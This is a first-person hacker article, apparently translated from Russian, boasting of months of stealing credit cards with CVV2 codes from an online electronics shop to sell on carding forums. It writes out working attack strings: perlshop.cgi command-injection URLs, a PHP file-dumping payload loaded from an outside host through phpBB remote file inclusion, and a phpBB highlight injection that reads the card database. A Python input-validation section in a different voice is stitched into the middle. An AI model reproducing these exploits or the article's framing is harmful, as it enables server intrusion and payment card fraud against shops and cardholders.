Useful articles, not only for the hacker

In the depths of my childhood, when a bunch of freaks had not yet brought about the collapse of the USSR, I heard the phrase "battle for the harvest". And now, as I write this article, I realize that this phrase will be its title.

You probably know that a hacker's earnings are not a business and are episodic, while money for food, beer and other pleasures is always needed. Most clients who contact me immediately ask me to crack paypal.com or ebay.com, apparently assuming the divine origin of hackers in general and of me in particular.
A hacker can keep his blood flowing steadily only if he has instant access to the shopping carts of several stores, takes the average daily harvest from them and exchanges it for evergreen currency on one of the carding forums, such as Carder-World.ru. Today, by the efforts of the Federal Security Service, almost all carding forums have been closed, including Carder-World.ru; the "heroes of cloak and dagger" would have done better catching entrenched Wahhabis and fighters.

And I want to tell the story of a long contest with the administrator of one such shop, which sells electronics.
Episode one.
Over a year ago I discovered a vulnerability in the script perlshop.cgi version 3.1
http://www.xakep.ru/post/21567/default.asp
The essence of the bug was that it was possible to execute commands on the server:
/perlshop.cgi?ACTION=enter&thispage=|ls;&ORDER_ID=!ORDERID!
Viewing the source code showed that files in the catalog directory are opened without any check for the characters | ;

    if (defined($input{'THISPAGE'})) {  ### Send a catalog page back with the unique ID set
        $prev_page = ""; $next_page = "";
        if ($add_navigation eq 'yes') {
            $catalog_page = "$catalog_directory/$input{'THISPAGE'}";
            if (-e $catalog_page) {
                # two-argument open: a "|" in $catalog_page makes Perl treat it as a shell command, not a file name
                open(TEMPLATE, $catalog_page) || &err_trap("can not open template file: $catalog_page");
                $temp = <TEMPLATE>;
                if ($temp =~ /<(\!\-\-)?PSTAG\s+prevpage\s*=\s*\"?([^\"]+?)\"?\s+nextpage\s*=\s*\"?([^\"]+?)\"?\s*(\-\-)?>/i) {
                    # (excerpt ends here)

After going through all the buggy shops, I managed to find one whose administrator, despite the ban, kept credit cards with cvv2. Knowing that the base with the cards is stored by default in the customers directory, every day I picked up a new crop in this simple way:
/perlshop.cgi?ACTION=ENTER&thispage=|cat%20customers/*;&ORDER_ID=!ORDERID!
Unfortunately the server had neither wget nor links, so I could not upload a shell and gain a foothold there.

But my happiness did not last long: three months later the shop admin sensed something was wrong, and one day, loading the URL, instead of cards I saw the "oblomingo bird". The admin had replaced the cart with version 4.4.0. Finding it on the internet and viewing the source, I realized it would bring me no joy; the | had been cut out:
    open(TEMPLATE, $catalog_page) or
        error_trap("can not open template file $catalog_page: $!");

    ----------
    deleted
    ----------
    # Remove invalid characters from the THISPAGE parameter
    $input{'THISPAGE'} =~ s/[|()<>;&]//g;
Admittedly, there is no check in the script for the "poison null byte". But, as I understand it, that is because via thispage the script is supposed to open files only from the catalog: open(TEMPLATE, $catalog_page).
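The 4.4.0 fix quoted above deletes the offending characters and carries on with whatever is left, and, as noted, ignores the null byte. The following Python is an added illustration, not perlshop's code, of the reject-rather-than-repair alternative a defender would want at that open() call: an allowlisted page name, an explicit null-byte check, and a resolved-path check that the file really lives in the catalog directory (in Perl the same idea is the three-argument open(my $fh, '<', $path) on a validated name, which has no pipe semantics). strip_filter reproduces the 4.4.0 behaviour for comparison; the catalog directory and its page are constructed in a temporary directory.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict

# The character class perlshop 4.4.0 strips from THISPAGE (quoted in the article).
STRIPPED = re.compile(r"[|()<>;&]")

# Allowlist for a catalog page name: starts alphanumeric, then letters, digits,
# dot, dash or underscore. No slash at all, so no path separators can get in.
SAFE_NAME = re.compile(r"\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\Z")


def strip_filter(thispage: str) -> str:
    """Mirror of the 4.4.0 fix s/[|()<>;&]//g: offending characters are deleted
    and whatever remains is used as the file name. A null byte is left alone."""
    return STRIPPED.sub("", thispage)


def validate_catalog_page(thispage: str, catalog_dir: str) -> Path:
    """Reject-don't-repair validator (constructed for this article, hypothetical
    name). Returns the resolved path inside catalog_dir or raises ValueError."""
    if "\0" in thispage:
        raise ValueError("null byte in page name")
    if not SAFE_NAME.match(thispage):
        raise ValueError("page name outside allowlist")
    base = Path(catalog_dir).resolve()
    candidate = (base / thispage).resolve()
    # resolve() follows symlinks: a page that points outside the catalog ends
    # up with a different parent directory and is refused.
    if candidate.parent != base or not candidate.is_file():
        raise ValueError("resolved path is not a regular file in the catalog")
    return candidate


def read_catalog_page(thispage: str, catalog_dir: str) -> str:
    """Safe counterpart of open(TEMPLATE, $catalog_page): validate first, then
    read the resolved path; nothing here can turn into a shell command."""
    return validate_catalog_page(thispage, catalog_dir).read_text()


def run_demo() -> Dict[str, str]:
    """Builds a throwaway catalog with one page and runs the inputs discussed in
    the article through the validator. Returns {input: outcome}."""
    probes = ["index.html", "|ls;", "index.html\0", "../etc/passwd"]
    outcome = {}
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "index.html").write_text("<html>catalog page</html>")
        for name in probes:
            try:
                outcome[name] = "accepted: " + read_catalog_page(name, d)
            except ValueError as err:
                outcome[name] = f"rejected: {err}"
    return outcome


if __name__ == "__main__":
    print("strip filter on '|ls;' ->", repr(strip_filter("|ls;")))
    print("strip filter keeps null byte:", "\0" in strip_filter("index.html\0"))
    for name, result in run_demo().items():
        print(repr(name), "->", result)
```

The point of the comparison: the strip filter turns "|ls;" into the harmless name "ls" but passes "index.html\0" through untouched, whereas the validator refuses every probe except the real page, and it does so before any file system call is made.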

Episode two.
Hunger and cold make people think harder. Realizing that the main entrance had been cut off, I decided to check the spare one. Having resolved the server's IP, I saw that more than a hundred sites were hosted on it. That already gave a chance.

The dull work of going through the sites began. On one of them phpBB 2.0.1 turned up. Finding a description of the bug, I quickly put together a functions_selects.php to be loaded by the buggy forum script install.php:
    <?php
    // the author's include payload: list the server root and dump every file in it
    $handle = opendir('/');
    echo "Directory handle: $handle\n";
    echo "Files:\n";
    while ($file = readdir($handle)) {
        print "$file\n";
        $f = fopen("/$file", "r");
        fpassthru($f);
    }
    closedir($handle);
    ?>
Having uploaded it to the site durito.narod.ru, along with an includes directory, and running
/forum/install.php?m=http://durito.narod.ru/ I got a listing of the root. Changing the path and uploading modified files to durito.narod.ru, I reached the treasured customers directory and its riches. Life was getting better.

But not for long: five months later the buggy forum disappeared.

Episode three.
One always wants to eat. So I began combing the server's sites for bugs again. Luck again: phpBB 2.0.8. And a SQL injection in phpBB forums up to 2.0.10 had just been discovered. Having worked through the description of the vulnerability, I once again got inside the server. But here the first bummer awaited me: the customers folder turned out to be empty. The second blow was not long in coming: viewing files in the users' directories /home/imya_yuzera/ was also closed. Files could only be viewed in /public_html/. Then I decided to look at the perlshop.cgi sources and understand why there were no cards. The admin had moved the database to /home/imya_yuzera/data/customers; fortunately, I was able to view its contents.

Opening viewtopic.php?t=7&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cat%20/home/imya_yuzera/data/customers/*;
I was very surprised that only 2 cards were lying in the base. Deciding that the shop was ruined, I went to bed.
A few days later I came back and saw that there were more cards in the cart, but they were different ones! I started to observe the store and realized that at about 7:30 am the administrator removes all the data about the day's transactions from the customers folder; the only exception is Sunday, so that was the only day of the week when I did not get up at 7 am and run to the computer to pick the crop before the administrator. So we lived with him "soul to soul" for another six months: I got up half an hour before him, and, as the proverb says, "God gives to the early riser."

And yesterday some bastard, instead of phpBB 2.0.8, put vBulletin Version 3.0.8 on his site. Again the pink oblomingo bird waved its wing at me. But the hacker is a patient bird, and my "Mein Kampf" for the harvest with the administrator is not yet over.

P.S. The fight continues; today I found another hole at the host, but I will tell about it later.


Your bug, Durito.
_________________
EAT THE RICH!